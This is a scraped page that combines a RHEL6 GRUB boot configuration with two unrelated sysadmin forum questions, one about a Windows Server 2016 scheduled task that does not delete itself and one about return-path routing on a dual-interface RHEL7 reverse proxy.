#boot=/dev/sda
default=0
timeout=5
splashimage=(hd0,0)/grub/splash.xpm.gz
hiddenmenu
password --encrypted <removed>
title Red Hat Enterprise Linux Server (2.6.32-754.14.2.el6.x86_64)
    root (hd0,0)
    kernel /vmlinuz-2.6.32-754.14.2.el6.x86_64 ro root=/dev/mapper/rootVG-rootVol rd_NO_LUKS LANG=en_US.UTF-8 rd_NO_MD SYSFONT=latarcyrheb-sun16 crashkernel=auto rd_LVM_LV=rootVG/rootVol  KEYBOARDTYPE=pc KEYTABLE=us rd_NO_DM rhgb quiet
    initrd /initramfs-2.6.32-754.14.2.el6.x86_64.img
title Red Hat Enterprise Linux Server (2.6.32-754.10.1.el6.x86_64)
    root (hd0,0)
    kernel /vmlinuz-2.6.32-754.10.1.el6.x86_64 ro root=/dev/mapper/rootVG-rootVol rd_NO_LUKS LANG=en_US.UTF-8 rd_NO_MD SYSFONT=latarcyrheb-sun16 crashkernel=auto rd_LVM_LV=rootVG/rootVol  KEYBOARDTYPE=pc KEYTABLE=us rd_NO_DM rhgb quiet
    initrd /initramfs-2.6.32-754.10.1.el6.x86_64.img

Task Scheduler trigger expire isn’t working

The task is set up through GPO as an immediate task. It ends in less than 30 seconds and it should delete itself. Seems to be affecting only Windows Server 2016. It deletes itself on Windows Server 2008 R2. Any suggestions on how to debug why it isn’t deleting?

It looks like Task scheduler ID becomes 00000. During the Task Completed it has a unique ID.

Task Scheduler successfully finished “{058c45b6-e31c-401a-b70e-2a90a2c9c110}” instance of the “\task_name” task for user “NT AUTHORITY\SYSTEM”.

Task scheduler screenshot

Configure multiple interfaces on RHEL7 with routing

We have a reverse proxy which has 2 network interfaces, one with a public IP and one with a private IP. So clients use the external interface and web servers the internal one. But for the admins it’s tricky because we want to exploit the reverse proxy with SSH using the private interface and use the websites like a regular user via the public interface. Here is a descriptive diagram:

Network scheme

So here is my network table on the reverse proxy:

[root@reverse ~]# route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
0.0.0.0         GW_INT          0.0.0.0         UG    101    0        0 ens224
0.0.0.0         GW_EXT          0.0.0.0         UG    102    0        0 ens256
NETWORK_INT     0.0.0.0         255.255.255.0   U     101    0        0 ens224
NETWORK_EXT     0.0.0.0         255.255.255.224 U     102    0        0 ens256

Previously we used the net.ipv4.conf.all.rp_filter parameter in sysctl to do asymmetric routing and communicate with both interfaces. But now there is a new network equipment (Palo Alto) which blocks the asymmetric routing.

So now I can access only the private one (I think because of the metric); I am getting a timeout on the public interface.

I think there is a way to tell the server: the traffic which comes in on one interface goes out on the same interface (without being redirected to the other interface). Is it possible?

Thank you in advance, Regards.